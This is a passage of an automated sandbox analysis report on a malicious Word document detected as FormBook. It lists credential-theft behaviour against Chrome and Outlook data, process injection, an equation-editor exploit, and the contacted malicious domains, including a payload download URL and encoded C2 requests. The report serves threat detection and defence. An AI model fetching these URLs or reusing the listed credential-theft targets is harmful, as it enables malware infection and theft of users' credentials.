            Source: Yara matchFile source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E293F7 sqlite3_bind_double,sqlite3_mutex_leave,8_2_61E293F7
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E293D0 sqlite3_bind_text16,8_2_61E293D0
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E29363 sqlite3_bind_text64,8_2_61E29363
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E2933C sqlite3_bind_text,8_2_61E2933C
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E292F5 sqlite3_bind_blob64,8_2_61E292F5
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E292CE sqlite3_mutex_leave,sqlite3_bind_blob,8_2_61E292CE
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E132AA sqlite3_bind_parameter_index,8_2_61E132AA
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E295EC sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,8_2_61E295EC
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E2957F sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2957F
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E29502 sqlite3_bind_pointer,sqlite3_mutex_leave,8_2_61E29502
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E294D1 sqlite3_bind_null,sqlite3_mutex_leave,8_2_61E294D1
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E294AB sqlite3_bind_int,sqlite3_bind_int64,8_2_61E294AB
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E2945C sqlite3_bind_int64,sqlite3_mutex_leave,8_2_61E2945C
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E296D3 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E296D3
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E03663 sqlite3_bind_parameter_count,8_2_61E03663
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E03675 sqlite3_bind_parameter_name,8_2_61E03675
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E169BB sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,8_2_61E169BB
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E16BD7 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,8_2_61E16BD7

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts33
            Exploitation for Client Execution            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
            Obfuscated Files or Information            		NTDS121
            Security Software Discovery            		Distributed Component Object Model1
            Email Collection            		6
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Install Root Certificate            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Masquerading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Modify Registry            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
            Virtualization/Sandbox Evasion            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
            Process Injection            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1444130 Sample: Doc PI.doc Startdate: 20/05/2024 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 14 other signatures 2->62 11 WINWORD.EXE 336 14 2->11         started        process3 process4 13 EQNEDT32.EXE 11 11->13         started        18 EQNEDT32.EXE 11->18         started        dnsIp5 52 universalmovies.top 104.21.74.191, 443, 49163, 49164 CLOUDFLARENETUS United States 13->52 40 C:\Users\user\AppData\Roaming\loud89334.scr, PE32 13->40 dropped 42 C:\Users\user\AppData\Local\...\loudzx[1].scr, PE32 13->42 dropped 80 Installs new ROOT certificates 13->80 82 Office equation editor establishes network connection 13->82 84 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->84 20 loud89334.scr 1 7 13->20         started        file6 signatures7 process8 signatures9 68 Multi AV Scanner detection for dropped file 20->68 70 Machine Learning detection for dropped file 20->70 72 Injects a PE file into a foreign processes 20->72 23 loud89334.scr 20->23         started        process10 signatures11 74 Maps a DLL or memory area into another process 23->74 26 sQNFFcxirzZbXqUULewCRS.exe 23->26 injected process12 signatures13 76 Maps a DLL or memory area into another process 26->76 78 Found direct / indirect Syscall (likely to bypass EDR) 26->78 29 dfrgui.exe 1 21 26->29         started        process14 dnsIp15 54 www.sqlite.org 45.33.6.223, 49166, 49167, 80 LINODE-APLinodeLLCUS United States 29->54 44 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 29->44 dropped 86 Tries to steal Mail credentials (via file / registry access) 29->86 88 Tries to harvest and steal browser information (history, passwords, etc) 29->88 90 Maps a DLL or memory area into another process 29->90 92 Queues an APC in another process (thread injection) 29->92 34 sQNFFcxirzZbXqUULewCRS.exe 29->34 injected 38 firefox.exe 29->38         started        file16 signatures17 process18 dnsIp19 46 www.99b6q.xyz 34->46 48 parkingpage.namecheap.com 91.195.240.19, 49176, 49177, 49178 SEDO-ASDE Germany 34->48 50 8 other IPs or domains 34->50 64 Found direct / indirect Syscall (likely to bypass EDR) 34->64 signatures20 66 Performs DNS queries to domains with low reputation 46->66

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Doc PI.doc37%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
            Doc PI.doc41%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scr100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\loud89334.scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scr16%ReversingLabs
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\loud89334.scr16%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            universalmovies.top21%VirustotalBrowse
            parkingpage.namecheap.com0%VirustotalBrowse
            aceautocorp.com1%VirustotalBrowse
            www.sqlite.org0%VirustotalBrowse
            www.99b6q.xyz0%VirustotalBrowse
            www.primeplay88.org4%VirustotalBrowse
            www.terelprime.com4%VirustotalBrowse
            www.aceautocorp.com1%VirustotalBrowse
            www.kinkynerdspro.blog4%VirustotalBrowse
            www.besthomeincome24.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.entrust.net030%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://www.sqlite.org/copyright.html.0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            https://universalmovies.top/v100%Avira URL Cloudphishing
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.kinkynerdspro.blog/ufuh/0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.terelprime.com/ufuh/?84O0=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&-Hc=N8_LbDFHuLL4ejZ100%Avira URL Cloudmalware
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.kinkynerdspro.blog/ufuh/2%VirustotalBrowse
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            http://www.aceautocorp.com0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%VirustotalBrowse
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://universalmovies.top/loudzx.scr100%Avira URL Cloudphishing
            http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw1%VirustotalBrowse
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe1%VirustotalBrowse
            http://www.aceautocorp.com1%VirustotalBrowse
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking1%VirustotalBrowse
            http://www.xn--matfrmn-jxa4m.se/ufuh/0%Avira URL Cloudsafe
            http://www.primeplay88.org/ufuh/0%Avira URL Cloudsafe
            https://universalmovies.top/loudzx.scr17%VirustotalBrowse
            http://www.aceautocorp.com/ufuh/0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%VirustotalBrowse
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            http://www.searchvity.com/?dn=3%VirustotalBrowse
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/ufuh/0%VirustotalBrowse
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%VirustotalBrowse
            http://www.primeplay88.org/ufuh/4%VirustotalBrowse
            https://universalmovies.top/loudzx.scrj100%Avira URL Cloudphishing
            http://www.sqlite.org/2021/sqlite-dll-win32-x86-3340000.zip0%Avira URL Cloudsafe
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%VirustotalBrowse
            http://www.sqlite.org/2021/sqlite-dll-win32-x86-3340000.zip0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            http://www.aceautocorp.com/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L0%Avira URL Cloudsafe
            http://www.sqlite.org/2017/sqlite-dll-win32-x86-3210000.zip0%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://www.sqlite.org/2017/sqlite-dll-win32-x86-3210000.zip0%VirustotalBrowse
            https://static.loopia.se/shared/style/2022-extra-pages.css0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            http://www.primeplay88.org/ufuh/?84O0=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&-Hc=N8_LbDFHuLL4ejZ0%Avira URL Cloudsafe
            http://www.aceautocorp.com/ufuh/1%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park1%VirustotalBrowse
            https://www.google.com/favicon.ico0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-114.png0%VirustotalBrowse
            https://static.loopia.se/responsive/styles/reset.css0%VirustotalBrowse
            https://universalmovies.top/loudzx.scrkkC:100%Avira URL Cloudphishing
            https://universalmovies.top/100%Avira URL Cloudphishing
            http://www.kinkynerdspro.blog/ufuh/?84O0=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&-Hc=N8_LbDFHuLL4ejZ0%Avira URL Cloudsafe
            http://www.searchvity.com/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%VirustotalBrowse
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            https://universalmovies.top/21%VirustotalBrowse
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.searchvity.com/4%VirustotalBrowse
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%VirustotalBrowse
            http://aceautocorp.com/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%VirustotalBrowse
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa1%VirustotalBrowse
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.xn--matfrmn-jxa4m.se
            		194.9.94.86
            		truetrueunknown
            universalmovies.top
            		104.21.74.191
            		truetrueunknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truetrueunknown
            aceautocorp.com
            		198.12.241.35
            		truetrueunknown
            www.sqlite.org
            		45.33.6.223
            		truefalseunknown
            www.kinkynerdspro.blog
            		54.38.220.85
            		truefalseunknown
            www.terelprime.com
            		66.96.161.166
            		truetrueunknown
            www.99b6q.xyz
            		unknown
            		unknowntrueunknown
            www.besthomeincome24.com
            		unknown
            		unknownfalseunknown
            www.aceautocorp.com
            		unknown
            		unknownfalseunknown
            www.primeplay88.org
            		unknown
            		unknownfalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.kinkynerdspro.blog/ufuh/false
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.xn--matfrmn-jxa4m.se/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheLtrue
            • Avira URL Cloud: safe
            		unknown
            http://www.terelprime.com/ufuh/?84O0=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&-Hc=N8_LbDFHuLL4ejZtrue
            • Avira URL Cloud: malware
            		unknown
            https://universalmovies.top/loudzx.scrtrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		unknown
            http://www.xn--matfrmn-jxa4m.se/ufuh/true
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.primeplay88.org/ufuh/true
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.aceautocorp.com/ufuh/true
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.sqlite.org/2021/sqlite-dll-win32-x86-3340000.zipfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.aceautocorp.com/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0Ltrue
            • Avira URL Cloud: safe
            		unknown
            http://www.sqlite.org/2017/sqlite-dll-win32-x86-3210000.zipfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
